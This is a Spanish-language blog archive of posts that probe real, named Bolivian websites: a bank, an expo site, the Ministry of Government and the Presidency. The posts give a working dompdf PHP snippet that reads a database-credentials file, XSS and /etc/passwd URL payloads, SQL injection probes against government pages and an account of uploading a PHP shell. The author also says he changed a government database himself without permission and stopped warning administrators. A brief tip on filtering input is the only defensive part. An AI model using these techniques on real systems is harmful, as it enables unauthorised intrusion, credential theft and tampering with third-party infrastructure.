Iloo

https://iloo.wordpress.com

Archivos por Etiqueta: hack

Web Applications Security: www.bancounion.com.bo (1)

Si bien el uso de CMS‘s ayuda y agiliza la publicación de un portal, no todo es tan fácil y simple, es necesario probar muchas cosas, asegurar los datos y la información, hacer pruebas de contenido, seguridad, etc; tomando en cuenta que un portal puede ser una vía de acceso al contenido del servidor , la red de equipos y la información en y detrás de esta.

Por ahora no tengo muchas ganas y tiempo para ir probando esto a detalle, pero haciendo una prueba rápida y simple al portal del Banco Unión S.A., cuya dirección es www.bancounion.com.bo, se tiene:

De aquí:

  • SO: windows, lo más probable NT.
  • Servidor web: Apache.
  • Ruta de instalación del servidor web.
  • CMS: joomla.
  • Un error.
  • Y un administrador distraído.

Web Applications Security: www.expoteco.org (1)

Esta semana se realiza en la ciudad de Oruro el Expoteco 2010 y ya que todo mundo esta hablando de este evento, me di a la tarea de dar una revisión a su sitio, el cual es www.expoteco.org.

Al parecer el sitio tiene bastante contenido Ajax (el diseño deja mucho que desear, pero eso lo dejamos para otro post), no parece tener (por el momento) alguna vulnerabilidad que explotar, navegando por el sitio llegamos hasta un directorio donde se encuentra la aplicación dompdf que básicamente sirve para generar archivos PDF a partir de archivos HTML (el desarrollador JarJar Soft se olvido borrar algunos archivos), en la propia aplicación hay una sección de demo online, eureka! un enorme agujero de seguridad.

Dentro del portal existe un archivo llamado DataBase.php, me late que este archivo contiene datos de conexión a la base de datos ^^

En el demo online de dompdf escribo una función php que sirve para ver el contenido de los archivos y siguiendo el modo de uso de dompdf tengo las siguiente ordenes:

<?php
 require_once("../dompdf_config.inc.php");
 show_source("../../DataBase.php");
 $dompdf = new DOMPDF();
 $dompdf->load_html($html);
 $dompdf->render();
 $dompdf->stream("sample.pdf");
?>

Y ya tenemos los datos de acceso a la base de datos.

Ya solo queda imaginar lo que se puede hacer…

Web Applications Security: tip 1, XSS

Unas sugerencias o tip, al momento de realizar el desarrollo de aplicaciones web es importante cuidar de agujeros (bugs) de tipo XSS (Cross-site scripting) ya que son de los más comunes en el desarrollo, básicamente se explota parámetros enviados mediante el método get.

Para ser más claros un ejemplo tenemos la siguiente sección de validación de usuarios (caso real):

Si validamos los datos de entrada:

Tenemos la siguiente dirección generada:

http://www.dominio.com/movil/index.php?msn=Debe%20especificar%20un%20usuario%20y%20password

Que pasa si cambiamos la dirección a esto:

http://www.dominio.com/movil/index.php?msn=%3Ciframe%20src=’https://iloo.wordpress.com’%3E%3C/iframe%3E

Tenemos:

Ahora que pasaría si ponemos:

http://www.dominio.com/movil/index.php?msn=/etc/passwd

Como se puede observar este método es uno de los más sencillos para poder tener acceso a datos del servidor y por tanto es necesario filtrar los datos enviados por el método get.

Web Applications Security: www.mingobierno.gob.bo (1)

Estoy cansado de ir avisando sobre las vulnerabilidades que existen en algunos sitios a sus respectivos administradores, esto porque no recibo ni siquiera un gracias, todo lo contrario, a una persona le hicieron un problema por comunicar algo que envió a este blog, cosa que demuestra que tales administradores son unos mediocres, así que: administradores se jod…

En este caso el sitio en cuestión es el Ministerio de Gobierno del Estado Plurinacional de Bolivia (www.mingobierno.gob.bo) No es necesario hacer un análisis minucioso para ver que el sitio tiene varias deficiencias en su implementación. Entre ellas: El enlace http://www.mingobierno.gob.bo/detalle_noticia.php?id=57 parece vulnerable, si cambiamos y lo dejamos de la siguiente manera: http://www.mingobierno.gob.bo/detalle_noticia.php?id=’, obtenemos un error:

Ya no queda más que hacer tiene un servidor windows con AppServ., vulnerable a SQL Injection y Blind SQL. Ahora el siguiente horror error es de del módulo encargado de la publicación de noticias:

Esta sección simplemente no tiene control de acceso, el nombre de la dirección es la más común, creo que no aprendieron que la seguridad por oscuridad no es seguridad.

Web Applications Security: www.presidencia.gob.bo (2)

Retomando la parte de administración.

Primero: En la sección de Gestionar Documentos.

Se observa un formulario para cargar archivos al servidor pero existe un error gravísimo, se puede cargar al servidor cualquier tipo de archivo (como veremos más adelante).

Recomendación: restringir la extensión y el tipo de archivo a subir al servidor.

Segundo: del punto anterior se puede cargar por ejemplo un shell php:

Recomendación: ver punto 1

Bueno ya teniendo el shell cargado se puede hacer prácticamente todo, cambiar nombres de directorios y archivos, subir y descargar archivos (se puede jugar una buena broma), también tener acceso a las bases de datos, etc, etc.

Lo dicho en el anterior post, el problema de la seguridad en el inicio de sesión se encuentra en la base de datos, así como no pude contactarme con el administrador, voy a arreglar yo mismo este problema, claro no es difícil, solo hay que borrar los registros nulos (espero que el administrador no haya colocado estos datos de manera consciente).

Ahora si iniciamos sesión de nuevo con los datos vacíos tenemos:

Por último y estoy seguro que la parte de inicio de sesión sigue siendo vulnerable a SQL Injection, con más tiempo voy a demostrar esta aseveración…